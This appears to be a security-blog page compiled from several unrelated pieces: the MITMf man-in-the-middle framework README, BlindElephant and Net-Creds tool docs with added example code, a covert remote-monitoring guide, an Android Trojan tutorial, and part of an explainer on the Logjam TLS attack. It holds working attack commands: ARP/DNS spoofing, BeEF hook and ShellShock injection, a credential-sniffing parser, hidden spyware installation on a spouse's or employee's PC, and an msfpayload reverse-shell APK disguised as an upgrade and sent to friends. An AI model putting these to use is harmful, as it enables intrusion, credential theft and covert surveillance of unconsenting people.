# Never Ending Security

# MITMf

Framework for Man-In-The-Middle attacks

Quick tutorials, examples and developer updates at: https://byt3bl33d3r.github.io

This tool is based on sergio-proxy and is an attempt to revive and update the project.

Before submitting issues, please read the relevant section in the wiki.

# Installation

MITMf relies on a LOT of external libraries, so it is highly recommended that you install the framework inside a virtualenv. This avoids permission issues and conflicts with your system site-packages (especially on Kali Linux).

Before starting the installation process:

• On Arch Linux:
pacman -S python2-setuptools libnetfilter_queue libpcap libjpeg-turbo

• On Debian and derivatives (e.g Ubuntu, Kali Linux etc…)
apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev


# Installing MITMf

Note: if you’re rocking Arch Linux: you’re awesome! Just remember to use pip2 instead of pip outside of the virtualenv

• Install virtualenvwrapper:
pip install virtualenvwrapper

• Edit your .bashrc or .zshrc file to source the virtualenvwrapper.sh script:
source /usr/bin/virtualenvwrapper.sh


The location of this script may vary depending on your Linux distro

• Restart your terminal or run:
source /usr/bin/virtualenvwrapper.sh

• Create the virtualenv (MITMf needs Python 2.7):
mkvirtualenv MITMf -p /usr/bin/python2.7

• Clone the MITMf repository:
git clone https://github.com/byt3bl33d3r/MITMf

• cd into the directory, initialize and clone the repos submodules:
cd MITMf && git submodule init && git submodule update --recursive

• Install the dependencies:
pip install -r requirements.txt

• You're ready to go! Check the install with:
python mitmf.py --help

# Description

MITMf aims to provide a one-stop-shop for Man-In-The-Middle and network attacks while updating and improving existing attacks and techniques.

Originally built to address the significant shortcomings of other tools (e.g. Ettercap, Mallory), it has been almost completely re-written from scratch to provide a modular and easily extendible framework that anyone can use to implement their own MITM attack.

# Features

• The framework contains a built-in SMB, HTTP and DNS server that can be controlled and used by the various plugins; it also contains a modified version of the SSLStrip proxy that allows for HTTP modification and a partial HSTS bypass.
• As of version 0.9.8, MITMf supports active packet filtering and manipulation (basically what etterfilters did, only better), allowing users to modify any type of traffic or protocol.
• The configuration file can be edited on-the-fly while MITMf is running and the changes are passed down through the framework: this allows you to tweak settings of plugins and servers while performing an attack.
• MITMf will capture FTP, IRC, POP, IMAP, Telnet, SMTP, SNMP (community strings), NTLMv1/v2 (over all supported protocols such as HTTP, SMB, LDAP etc.) and Kerberos credentials by using Net-Creds, which is run on startup.
• Responder integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support.

# Active packet filtering/modification

You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!)

For example, here’s a stupid little filter that just changes the destination IP address of ICMP packets:

```python
if packet.haslayer(ICMP):
    log.info('Got an ICMP packet!')
    packet.dst = '192.168.1.0'
```

• Use the packet variable to access the packet in a Scapy compatible format
• Use the data variable to access the raw packet data

Now to use the filter all we need to do is:
python mitmf.py -F ~/filter.py

You will probably want to combine that with the Spoof plugin to actually intercept packets from someone else ;)

Note: you can modify filters on-the-fly without restarting MITMf!
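Scapy hides one detail of that filter: once you change an IP header field, the IPv4 header checksum no longer matches and the packet will be dropped by the next hop unless the checksum is recomputed (Scapy does this for you when the field is left unset). The following is an added example, not MITMf code, that does the same rewrite on the raw `data` bytes a filter receives and fixes the checksum by hand; the ICMP packet it operates on is constructed inline, not a capture.

```python
"""What `packet.dst = '...'` in a MITMf filter has to get right at the byte level
(added example, not MITMf code). Scapy recomputes the IPv4 header checksum for
you when the field is unset; it is done by hand here so the caveat is visible."""
import struct

ICMP = 1


def ipv4_checksum(header: bytes) -> int:
    """RFC 791: one's-complement sum of 16-bit words, complemented."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4(pkt: bytes) -> dict:
    """Minimal IPv4 header parse of the raw `data` a filter sees."""
    ihl = (pkt[0] & 0x0F) * 4
    return {
        "ihl": ihl,
        "proto": pkt[9],
        "src": ".".join(str(b) for b in pkt[12:16]),
        "dst": ".".join(str(b) for b in pkt[16:20]),
        "chksum": struct.unpack("!H", pkt[10:12])[0],
    }


def checksum_ok(pkt: bytes) -> bool:
    """A header with a correct checksum sums (checksum included) to 0xFFFF, so its complement is 0."""
    ihl = (pkt[0] & 0x0F) * 4
    return ipv4_checksum(pkt[:ihl]) == 0


def rewrite_dst(pkt: bytes, new_dst: str) -> bytes:
    """Byte-level equivalent of `packet.dst = new_dst`, then fix the header checksum.
    For TCP/UDP payloads the transport checksum (pseudo-header) would need fixing too."""
    ihl = (pkt[0] & 0x0F) * 4
    header = bytearray(pkt[:ihl])
    header[16:20] = bytes(int(o) for o in new_dst.split("."))
    header[10:12] = b"\x00\x00"
    header[10:12] = struct.pack("!H", ipv4_checksum(bytes(header)))
    return bytes(header) + pkt[ihl:]


def filter_packet(data: bytes, new_dst: str) -> bytes:
    """The README's filter applied to raw `data`: only ICMP gets its dst rewritten."""
    if parse_ipv4(data)["proto"] == ICMP:
        return rewrite_dst(data, new_dst)
    return data


def build_icmp_echo(src: str, dst: str, payload: bytes = b"ping") -> bytes:
    """Constructed sample packet (not a capture): IPv4 + ICMP echo request."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1) + payload
    icmp = icmp[:2] + struct.pack("!H", ipv4_checksum(icmp)) + icmp[4:]
    header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, 64, ICMP, 0,
                         bytes(int(o) for o in src.split(".")),
                         bytes(int(o) for o in dst.split(".")))
    header = header[:10] + struct.pack("!H", ipv4_checksum(header)) + header[12:]
    return header + icmp
```

If you write filters that touch TCP or UDP fields, remember that the transport checksum covers a pseudo-header containing the IP addresses, so a rewritten source or destination address invalidates it as well; in Scapy, `del packet[TCP].chksum` (or the UDP equivalent) before the packet is re-serialised.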

# Examples

The most basic usage starts the HTTP proxy, the SMB, DNS and HTTP servers, and Net-Creds on interface enp3s0:

python mitmf.py -i enp3s0

ARP poison the whole subnet with the gateway at 192.168.1.1 using the Spoof plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1

Same as above + a WPAD rogue proxy server using the Responder plugin:

python mitmf.py -i enp3s0 --spoof --arp --gateway 192.168.1.1 --responder --wpad

ARP poison 192.168.1.16-45 and 192.168.0.1/24 with the gateway at 192.168.1.1:

python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.16-45,192.168.0.1/24 --gateway 192.168.1.1

Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1

Enable LLMNR/NBTNS/MDNS spoofing:

python mitmf.py -i enp3s0 --responder --wredir --nbtns

Enable DHCP spoofing (the ip pool and subnet are pulled from the config file):

python mitmf.py -i enp3s0 --spoof --dhcp

Same as above with a ShellShock payload that will be executed if any client is vulnerable:

python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'

Inject an HTML IFrame using the Inject plugin:

python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com

Inject a JS script:

python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js

And much much more!

Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..)

For a complete list of available options, just run python mitmf.py --help

# Currently available plugins

• HTA Drive-By : Injects a fake update notification and prompts clients to download an HTA application
• SMBTrap : Exploits the ‘SMB Trap’ vulnerability on connected clients
• ScreenShotter : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
• Responder : LLMNR, NBT-NS, WPAD and MDNS poisoner
• SSLstrip+ : Partially bypass HSTS
• Spoof : Redirect traffic using ARP, ICMP, DHCP or DNS spoofing
• BeEFAutorun : Autoruns BeEF modules based on a client’s OS or browser type
• AppCachePoison : Performs HTML5 App-Cache poisoning attacks
• Ferret-NG : Transparently hijacks client sessions
• BrowserProfiler : Attempts to enumerate all browser plugins of connected clients
• FilePwn : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
• Inject : Inject arbitrary content into HTML content
• BrowserSniper : Performs drive-by attacks on clients with out-of-date browser plugins
• JSkeylogger : Injects a Javascript keylogger into a client’s webpages
• Replace : Replace arbitrary content in HTML content
• SMBAuth : Evoke SMB challenge-response authentication attempts
• Upsidedownternet : Flips images 180 degrees

More information can be found on: https://github.com/byt3bl33d3r/MITMf

## BlindElephant Web Application Fingerprinter

The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.

Sourceforge Project Page: https://sourceforge.net/projects/blindelephant/
Discussion and Forums: http://www.qualys.com/blindelephant

### Getting Started

BlindElephant can be used directly as a tool on the command line, or as a library to provide fingerprinting functionality to another program.

#### Pre-requisites:

• Python 2.6.x (prefer 2.6.5); users of earlier versions may have difficulty installing or running BlindElephant.

#### Get the code:

• Browse SVN
• Checkout via SVN: svn co https://blindelephant.svn.sourceforge.net/svnroot/blindelephant/trunk blindelephant

#### Installation:

Installation is only required if you plan to use BlindElephant as a library. Make sure that your Python installation has distutils, and then do:

cd blindelephant/src
sudo python setup.py install

(Windows users, omit sudo.)

#### Example Usage (Command Line):

setup.py will have placed BlindElephant.py in your /usr/local/bin dir.

```text
$ BlindElephant.py
Usage: BlindElephant.py [options] url appName

Options:
  -h, --help            show this help message and exit
  -p PLUGINNAME, --pluginName=PLUGINNAME
                        Fingerprint version of plugin (should apply to web app
                        given in appname)
  -s, --skip            Skip fingerprinting webpp, just fingerprint plugin
  -n NUMPROBES, --numProbes=NUMPROBES
                        Number of files to fetch (more may increase accuracy).
                        Default: 15
  -w, --winnow          If more than one version are returned, use winnowing to
                        attempt to narrow it down (up to numProbes additional
                        requests).
  -l, --list            List supported webapps and plugins

Use "guess" as app or plugin name to attempt to discover which supported
apps/plugins are installed.

$ python BlindElephant.py http://laws.qualys.com movabletype
Loaded /usr/local/lib/python2.6/dist-packages/blindelephant/dbs/movabletype.pkl with 96 versions, 2229 differentiating paths, and 209 version groups.
Starting BlindElephant fingerprint for version of movabletype at http://laws.qualys.com

Fingerprinting resulted in:
4.22-en
4.22-en-COM
4.23-en
4.23-en-COM

Best Guess: 4.23-en-COM
```
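The run above shows the whole technique in miniature: every probed file narrows the candidate set, a file that is missing or locally edited narrows nothing, the tool reports the highest surviving version as its best guess, and `--winnow` spends extra requests on the files that split the survivors best. The following is an added example, not BlindElephant's code, of that algorithm over a constructed five-release corpus (paths, contents and versions are invented; the real database holds precomputed hashes, not file contents).

```python
"""BlindElephant's static-file fingerprinting, as an added example (not the
project's code). The release corpus, paths and contents below are constructed;
BlindElephant's real database holds precomputed hashes for the actual releases."""
import hashlib
import re

RELEASES = {
    "4.22-en":     {"/mt-static/js/mt.js": b"mt 4.22", "/mt-static/styles.css": b"css A", "/readme.txt": b"en"},
    "4.22-en-COM": {"/mt-static/js/mt.js": b"mt 4.22", "/mt-static/styles.css": b"css A", "/readme.txt": b"en-COM"},
    "4.23-en":     {"/mt-static/js/mt.js": b"mt 4.23", "/mt-static/styles.css": b"css A", "/readme.txt": b"en"},
    "4.23-en-COM": {"/mt-static/js/mt.js": b"mt 4.23", "/mt-static/styles.css": b"css A", "/readme.txt": b"en-COM"},
    "4.30-en":     {"/mt-static/js/mt.js": b"mt 4.30", "/mt-static/styles.css": b"css B", "/readme.txt": b"en"},
}


def build_db(releases):
    """Precompute path -> {sha1(content): {versions}} (the .pkl the CLI 'Loaded')."""
    db = {}
    for version, files in releases.items():
        for path, content in files.items():
            digest = hashlib.sha1(content).hexdigest()
            db.setdefault(path, {}).setdefault(digest, set()).add(version)
    return db


def version_key(version):
    """Order like distutils LooseVersion: numeric parts numerically, text lexically."""
    return [(0, int(t)) if t.isdigit() else (1, t) for t in re.split(r"[.-]", version)]


def fingerprint(fetch, db, paths):
    """Intersect the candidate sets of every probed path. A path whose content hashes
    to nothing known (404, locally edited file) is skipped rather than counted as
    evidence against anything; that is what makes the technique robust to site edits."""
    candidates = None
    for path in paths:
        content = fetch(path)
        if content is None:
            continue
        known = db.get(path, {}).get(hashlib.sha1(content).hexdigest())
        if not known:
            continue
        candidates = set(known) if candidates is None else candidates & known
    return sorted(candidates or (), key=version_key)


def winnow_path(db, candidates, tried):
    """Winnowing: pick the untried path whose hashes split the remaining candidates
    most evenly (smallest largest bucket), so one more request tells you the most."""
    best, best_worst_bucket = None, None
    for path, buckets in db.items():
        if path in tried:
            continue
        sizes = [len(vs & candidates) for vs in buckets.values() if vs & candidates]
        if len(sizes) < 2:
            continue
        if best_worst_bucket is None or max(sizes) < best_worst_bucket:
            best, best_worst_bucket = path, max(sizes)
    return best


def best_guess(versions):
    """BlindElephant reports the highest remaining version as Best Guess."""
    return versions[-1] if versions else None


def make_fetcher(site_files):
    """Offline stand-in for HTTP GET against the target: content, or None for a 404."""
    return lambda path: site_files.get(path)
```

The design point worth keeping from this is the asymmetry in `fingerprint`: a match is strong evidence, a non-match is none at all, because administrators delete, minify and edit static files. That is also why the CLI asks for more probes (`-n`) rather than trusting one file.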


#### Example Usage (Library):

```python
>>> from blindelephant.Fingerprinters import WebAppFingerprinter
>>>
>>> # Construct the fingerprinter
>>> # use default logger pointing to console; can pass "logger" arg to change output
>>> fp = WebAppFingerprinter("http://laws.qualys.com", "movabletype")
>>> # do the fingerprint; data becomes available as instance vars
>>> fp.fingerprint()
(same as above)
>>> print "Possible versions:", fp.ver_list
Possible versions: [LooseVersion ('4.22-en'), LooseVersion ('4.22-en-COM'), LooseVersion ('4.23-en'), LooseVersion ('4.23-en-COM')]
>>> print "Max possible version: ", fp.best_guess
Max possible version: 4.23-en-COM
```

### The Static File Fingerprinting Approach in One Picture

[Figure: The Static File Fingerprinting Approach in One Picture; not reproduced here.]

More information about BlindElephant can be found on: http://blindelephant.sourceforge.net

## Net-Creds – Sniffs Sensitive Data From Interface Or Pcap

Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.
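Those two properties, reassembling fragmented packets before parsing and identifying the service by content rather than port, are what separate a credential sniffer from a grep over packet payloads. The following is an added example, not net-creds code, showing both on one TCP stream: the HTTP requests and the way they are cut into segments are constructed for the example, with a header and the POST body deliberately split across packets and one segment retransmitted.

```python
"""Net-Creds-style credential extraction from a TCP stream, as an added example
(not net-creds code). The HTTP stream and its segmentation are constructed."""
import base64
from urllib.parse import parse_qs

LOGIN_FIELDS = {"user", "username", "login", "email", "pass", "password", "passwd"}

_BODY = b"username=bob&password=s3cret"
STREAM = (
    b"GET /index HTTP/1.1\r\nHost: intranet.example\r\n"
    b"Authorization: Basic " + base64.b64encode(b"alice:hunter2") + b"\r\n\r\n"
    b"POST /login HTTP/1.1\r\nHost: intranet.example\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: " + str(len(_BODY)).encode() + b"\r\n\r\n" + _BODY
)


def make_segments(stream, cuts, seq0=1000):
    """Split a stream into (seq, payload) TCP segments at the given byte offsets."""
    bounds = [0] + sorted(cuts) + [len(stream)]
    return [(seq0 + a, stream[a:b]) for a, b in zip(bounds, bounds[1:]) if b > a]


def reassemble(segments):
    """Order by sequence number and drop retransmitted bytes. Gaps are simply
    skipped over, which is how a lost segment can cost you a credential."""
    stream, expected = b"", None
    for seq, payload in sorted(segments):
        end = seq + len(payload)
        if expected is None:
            expected = seq
        if end <= expected:
            continue                             # pure retransmission
        if seq < expected:
            payload = payload[expected - seq:]   # overlapping retransmission
        stream += payload
        expected = end
    return stream


def iter_http_requests(stream):
    """Yield (request_line, headers, body). Content-Length delimits the body, so a
    POST body split across packets is still recovered whole after reassembly."""
    while b"\r\n\r\n" in stream:
        head, _, rest = stream.partition(b"\r\n\r\n")
        lines = head.split(b"\r\n")
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(b":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get(b"content-length", b"0"))
        yield lines[0], headers, rest[:length]
        stream = rest[length:]


def extract_http_creds(stream):
    """Port-agnostic: whatever parses as HTTP is checked for Basic auth and for
    POST form fields with login-looking names."""
    found = []
    for request_line, headers, body in iter_http_requests(stream):
        auth = headers.get(b"authorization", b"")
        if auth.lower().startswith(b"basic "):
            user, _, password = base64.b64decode(auth[6:]).decode("latin-1").partition(":")
            found.append(("basic", user, password))
        if request_line.startswith(b"POST "):
            form = parse_qs(body.decode("latin-1"))
            hit = {k: v[0] for k, v in form.items() if k.lower() in LOGIN_FIELDS}
            if hit:
                found.append(("form", request_line.split()[1].decode(), hit))
    return found
```

Run `extract_http_creds(reassemble(segments))` rather than the extractor per packet: with the cut points used in the test, the `Authorization:` header and the form body each straddle two segments and a per-packet regex would miss both.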
### Sniffs

• URLs visited
• POST loads sent
• HTTP form logins/passwords
• HTTP basic auth logins/passwords
• HTTP searches
• FTP logins/passwords
• IRC logins/passwords
• POP logins/passwords
• IMAP logins/passwords
• Telnet logins/passwords
• SMTP logins/passwords
• SNMP community string
• NTLMv1/v2 over all supported protocols like HTTP, SMB, LDAP, etc.
• Kerberos

### Examples

• Auto-detect the interface to sniff:
sudo python net-creds.py

• Choose eth0 as the interface:
sudo python net-creds.py -i eth0

• Ignore packets to and from 192.168.0.2:
sudo python net-creds.py -f 192.168.0.2

• Read from pcap:
python net-creds.py -p pcapfile

#### OSX

Credit to epocs:

```shell
sudo easy_install pip
sudo pip install scapy
sudo pip install pcapy
brew install libdnet --with-python
mkdir -p /Users/<username>/Library/Python/2.7/lib/python/site-packages
echo 'import site; site.addsitedir("/usr/local/lib/python2.7/site-packages")' >> /Users/<username>/Library/Python/2.7/lib/python/site-packages/homebrew.pth
sudo pip install pypcap
brew tap brona/iproute2mac
brew install iproute2mac
```

Then replace '/sbin/ip' on line 74 with '/usr/local/bin/ip'.

More Info On: https://github.com/DanMcInerney/net-creds

## How To Monitor a Remote Computer For Free

Do you want to monitor a remote computer for free? If the answer is yes, you can do it. This article is full of tricks and tips that you can use to monitor a remote computer for free.

## 1. Monitor a Computer Remotely with Ammy Admin

Ammy Admin is a popular program used for remote system administration and educational purposes. You can easily turn this innocent-looking software into a spy that lets you see what is going on at a remote PC. Here is how to do it:

1. Download Ammy Admin (if the link is not working, use the MediaFire link).
2. Run the program on the computer you want to monitor. A window will appear.
3. Remember or write down the ID of the PC shown in the green field "Your ID". Then go to Ammy > Settings.
Another window will pop up.

4. Uncheck all the checkboxes except the first one. Then click the "Access Permissions" button. (If you want to test the video performance, use the "Video system speed test" button.) Another window will pop up.
5. Uncheck "Protect these settings from remote computer" and then click the plus button. A small window will appear.
6. Enter a password and then confirm it. Click "OK". Then click "OK" again to save the access permissions.
7. In the main menu, go to Ammy > Service > Install. Ammy Admin will display a confirmation message.
8. Go to Ammy > Service > Start. Then close the application. Ammy Admin will now run automatically in hidden mode when Windows starts up.
9. Run Ammy Admin on the computer from which you want to monitor the remote PC.
10. Enter the ID of the child computer in the "client ID/IP" field. Then check the "View only" box and click "Connect".
11. Ammy Admin will display a password box.
12. Enter the password that you set while configuring the remote PC and then click "OK".
13. Wait a moment; it will establish a connection to the remote PC and display the live screen.

If you want to listen to what is going on at the remote PC, click the "voice chat" button on the control panel of the remote desktop window. You can also access files on the remote PC using the "File Manager" button, and you can turn your PC into a remote control for the distant computer by unchecking the "View only" option.

Let's move on to technique #2.

## 2. Monitor a Computer Remotely with ActivTrak

ActivTrak is a cloud-based monitoring service that you can use to monitor children, employees or a spouse. The company also offers paid plans, but here we are using a free account. Let's start!

1. Go to activtrak.com.
2. Enter your email address and then click "Free Secure Signup". Wait a few seconds and a pop-up box will appear.
3. Enter your name, password and organization name, and click "OK". Then download the ActivTrak Agent (click the "Download ActivTrak Agent" button).
4. After downloading the ActivTrak Agent .msi, install it on the remote computers you want to monitor.
5. Done! Go to your own computer and visit https://app.activtrak.com/Account/login. Log in with your email and password and you will see the real-time activities of the remote computer.

You can also use this free account as a remote control for your distant PC, but with fewer features than Ammy Admin. The limits of the free account are: limited screenshots, only 3 agents, only one user and 3GB of storage. The paid service adds unlimited screenshots, unlimited users, unlimited storage, a remote installer, phone support, data export and an ad-free experience.

If you suspect that you are being monitored, check all the processes in Task Manager and then use Detekt to scan your computer. Also use an on-screen keyboard to enter usernames and passwords.

## How To Remotely Hack Android using Kali Linux

This is a tutorial explaining how to hack Android phones with Kali. I can't see any tutorials explaining this hack/exploit, so I made one. (Still, you may already know about this.)

## Step 1: Fire Up Kali

• Open a terminal and build a Trojan .apk with msfpayload (replace LHOST with your own IP):
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk
• You can also hack Android over the WAN (i.e. through the Internet) by using your public/external IP as LHOST and by port forwarding (ask me about port forwarding in the comment section if you have problems).

## Step 2: Open Another Terminal

• Open another terminal while the file is being produced.
• Load the Metasploit console by typing: msfconsole

## Step 3: Set Up a Listener

• After it loads (it will take time), load the multi-handler exploit by typing: use exploit/multi/handler
• Set up a (reverse) payload by typing: set payload android/meterpreter/reverse_tcp
• To set LHOST type: set LHOST 192.168.0.4 (even if you are attacking over the WAN, type your private/internal IP here, not the public/external one)

## Step 4: Exploit!

• Finally type exploit to start the listener.
• Copy the application that you made (Upgrader.apk) from the root folder to your Android phone.
• Then send it by uploading it to Dropbox or any sharing website (like www.speedyshare.com).
• Then send the link that the website gave you to your friends and exploit their phones (only on the LAN, but if you used the WAN method you can use the exploit anywhere on the Internet).
• Let the victim install the Upgrader app (they would think it is meant to upgrade some features on the phone).
• Note that "Allow installation of apps from Unknown Sources" must be enabled in the security settings of the Android phone for the Trojan to install.
• And when they click Open...

## Step 5: BOOM!

There comes the Meterpreter prompt. See Meterpreter commands here: http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics

## The Logjam Attack

In case you haven't heard, there's a new SSL/TLS vulnerability making the rounds. Nicknamed Logjam, the new attack is 'special' in that it may admit complete decryption or hijacking of any TLS connection you make to an improperly configured web or mail server. Worse, there's at least circumstantial evidence that similar (and more powerful) attacks might already be in the toolkit of some state-level attackers such as the NSA.
This work is the result of an unusual collaboration between a fantastic group of co-authors spread all around the world, including institutions such as the University of Michigan, INRIA Paris-Rocquencourt, INRIA Paris-Nancy, Microsoft Research, Johns Hopkins and the University of Pennsylvania. It's rare to see this level of collaboration between groups with so many different areas of expertise, and I hope to see a lot more like it. (Disclosure: I am one of the authors.)

The absolute best way to understand the Logjam result is to read the technical research paper. This post is mainly aimed at people who want a slightly less technical form. For those with even shorter attention spans, here's the TL;DR:

It appears that the Diffie-Hellman protocol, as currently deployed in SSL/TLS, may be vulnerable to a serious downgrade attack that restores it to 1990s "export" levels of security, and offers a practical "break" of the TLS protocol against poorly configured servers. Even worse, extrapolation of the attack requirements, combined with evidence from the Snowden documents, provides some reason to speculate that a similar attack could be leveraged against protocols (including TLS, IPSec/IKE and SSH) using 768- and 1024-bit Diffie-Hellman.

I'm going to tackle this post in the usual 'fun' question-and-answer format I save for this sort of thing.

### What is Diffie-Hellman and why should I care about TLS "export" ciphersuites?

Diffie-Hellman is probably the most famous public key cryptosystem ever invented. Publicly discovered by Whit Diffie and Martin Hellman in the late 1970s (and a few years earlier, in secret, by UK GCHQ), it allows two parties to negotiate a shared encryption key over a public connection.

Diffie-Hellman is used extensively in protocols such as SSL/TLS and IPSec, which rely on it to establish the symmetric keys that are used to transport data. To do this, both parties must agree on a set of parameters to use for the key exchange.
In traditional ('mod p') Diffie-Hellman, these parameters consist of a large prime number p, as well as a 'generator' g. The two parties now exchange keys as shown below:

[Figure: Classical Diffie-Hellman (source). Alice picks a secret a and sends g^a mod p; Bob picks a secret b and sends g^b mod p; each side computes the shared key (g^b)^a = (g^a)^b = g^ab mod p.]

TLS supports several variants of Diffie-Hellman. The one we're interested in for this work is the 'ephemeral' non-elliptic ("DHE") protocol variant, which works in a manner that's nearly identical to the diagram above. The server takes the role of Alice, selecting (p, g, g^a mod p) and signing this tuple (and some nonces) using its long-term signing key. The client responds with g^b mod p and the two sides then calculate a shared secret.

Just for fun, TLS also supports an obsolete 'export' variant of Diffie-Hellman. These export ciphersuites are a relic from the 1990s when it was illegal to ship strong encryption out of the country. What you need to know about "export DHE" is simple: it works identically to standard DHE, but limits the size of p to 512 bits. Oh yes, and it's still out there today. Because the Internet.

### How do you attack Diffie-Hellman?

The best known attack against a correct Diffie-Hellman implementation involves capturing the value g^a mod p and solving to find the secret key a. The problem of finding this value is known as the discrete logarithm problem, and it's thought to be mathematically intractable, at least when Diffie-Hellman is implemented in cryptographically strong groups (e.g., when p is of size 2048 bits or more).

Unfortunately, the story changes dramatically when p is relatively small, for example 512 bits in length. Given a value g^a mod p for a 512-bit p, it should at least be possible to efficiently recover the secret a and read traffic on the connection.

### Most TLS servers don't use 512-bit primes, so who cares?

The good news here is that weak Diffie-Hellman parameters are almost never used purposely on the Internet. Only a trivial fraction of the SSL/TLS servers out there today will organically negotiate 512-bit Diffie-Hellman.
For the most part these are crappy embedded devices such as routers and video-conferencing gateways. However, there is a second class of servers that are capable of supporting 512-bit Diffie-Hellman when clients request it, using a special mode called the 'export DHE' ciphersuite. Disgustingly, these servers amount to about 8% of the Alexa top million sites (and a whopping 29% of SMTP/STARTTLS mail servers). Thankfully, most decent clients (AKA popular browsers) won't willingly negotiate 'export-DHE', so this would also seem to be a dead end.

It isn't.

[Figure: ServerKeyExchange message (RFC 5246). The signature covers client_random, server_random and the DH parameters (dh_p, dh_g, dh_Ys), and nothing else.]

You see, before SSL/TLS peers can start engaging in all this fancy cryptography, they first need to decide which ciphers they're going to use. This is done through a negotiation process in which the client proposes some options (e.g., RSA, DHE, DHE-EXPORT), and the server picks one.

This all sounds simple enough. However, one of the early, well known flaws in SSL/TLS is the protocol's failure to properly authenticate these 'negotiation' messages. In very early versions of SSL they were not authenticated at all. SSLv3 and TLS tacked on an authentication process, but one that takes place only at the end of the handshake.*

This is particularly unfortunate given that TLS servers often have the ability to authenticate their messages using digital signatures, but don't really take advantage of this. For example, when two parties negotiate Diffie-Hellman, the parameters sent by the server are transmitted within a signed message called the ServerKeyExchange (shown above). The signed portion of this message covers the parameters, but neglects to include any information about which ciphersuite the server thinks it's negotiating.

If you remember that the only difference between DHE and DHE-EXPORT is the size of the parameters the server sends down, you might start to see the problem.
Here it is in a nutshell: if the server supports DHE-EXPORT, the attacker can 'edit' the negotiation messages sent from the client, even if the client doesn't support export DHE, replacing the client's list of supported ciphers with only export DHE. The server will in turn send back a signed 512-bit export-grade Diffie-Hellman tuple, which the client will blindly accept, because it doesn't realize that the server is negotiating the export version of the ciphersuite. From its perspective this message looks just like 'standard' Diffie-Hellman with really crappy parameters.

[Figure: Overview of the Logjam active attack (source: paper).]

All this tampering should run into a huge snag at the end of the handshake, when the client and server exchange Finished messages that include a MAC of the handshake transcript. At this point the client should learn that something funny is going on, i.e., that what it sent no longer matches what the server is seeing. However, the loophole is this: if the attacker can recover the Diffie-Hellman secret quickly, before the handshake ends, she can forge her own Finished messages. In that case the client and server will be none the wiser.

The upshot is that executing this attack requires the ability to solve a 512-bit discrete logarithm before the client and server exchange Finished messages. That seems like a tall order.

### Can you really solve a discrete logarithm before a TLS handshake times out?

In practice, the fastest route to solving the discrete logarithm in finite fields is via an algorithm called the Number Field Sieve (NFS). Using NFS to solve a single 512-bit discrete logarithm instance requires several core-years, or about a week of wall-clock time given a few thousand cores, which would seem to rule out solving discrete logs in real time. However, there is a complication. In practice, NFS can actually be broken up into two different steps:

1. Pre-computation (for a given prime p).
This includes the process of polynomial selection, sieving, and linear algebra, all of which depend only on p. The output of this stage is a table for use in the second stage.
2. Solving to find a (for a given g^a mod p). The final stage, called the descent, uses the table from the precomputation. This is the only part of the algorithm that actually involves a specific g and g^a.

The important thing to know is that the first stage of the attack consumes the vast majority of the time, up to a full week on a large-scale compute cluster. The descent stage, on the other hand, requires only a few core-minutes. Thus the attack cost depends primarily on where the server gets its Diffie-Hellman parameters from. The best case for an attacker is when p is hard-coded into the server software and used across millions of machines. The worst case is when p is re-generated routinely by the server. I'll let you guess what real TLS servers actually do.

In fact, large-scale Internet scans by the team at the University of Michigan show that most popular web server software tends to re-use a small number of primes across thousands of server instances. This is done because generating prime numbers is scary, so implementers default to using a hard-coded value or a config file supplied by your Linux distribution. The situation for export Diffie-Hellman is particularly awful, with only two (!) primes used across up to 92% of enabled Apache/mod_ssl sites.

[Figure: Number of seconds to solve a 512-bit discrete log (source: paper).]

The upshot of all of this is that about two weeks of pre-computation is sufficient to build a table that allows you to perform the downgrade against most export-enabled servers in just a few minutes (see the chart). This is fast enough that it can be done before the TLS connection timeout. Moreover, even if this is not fast enough, the connection can often be held open longer by using clever protocol tricks, such as sending TLS warning messages to reset the timeout clock.
Keep in mind that none of this shared prime craziness matters when you're using sufficiently large prime numbers (on the order of 2048 bits or more). It's only a practical issue when you're using small primes, like 512-bit, 768-bit or, and here's a sticky one I'll come back to in a minute, 1024-bit.

### How do you fix the downgrade to export DHE?

The best and most obvious fix for this problem is to exterminate export ciphersuites from the Internet. Unfortunately, these awful configurations are the default in a number of server software packages (looking at you Postfix), and getting people to update their configurations is surprisingly difficult (see e.g., FREAK).

A simpler fix is to upgrade the major web browsers to resist the attack. The easy way to do this is to enforce a larger minimum size for received DHE keys. The problem here is that the fix itself causes some collateral damage: it will break a small but significant fraction of lousy servers that organically negotiate (non-export) DHE with 512-bit keys.

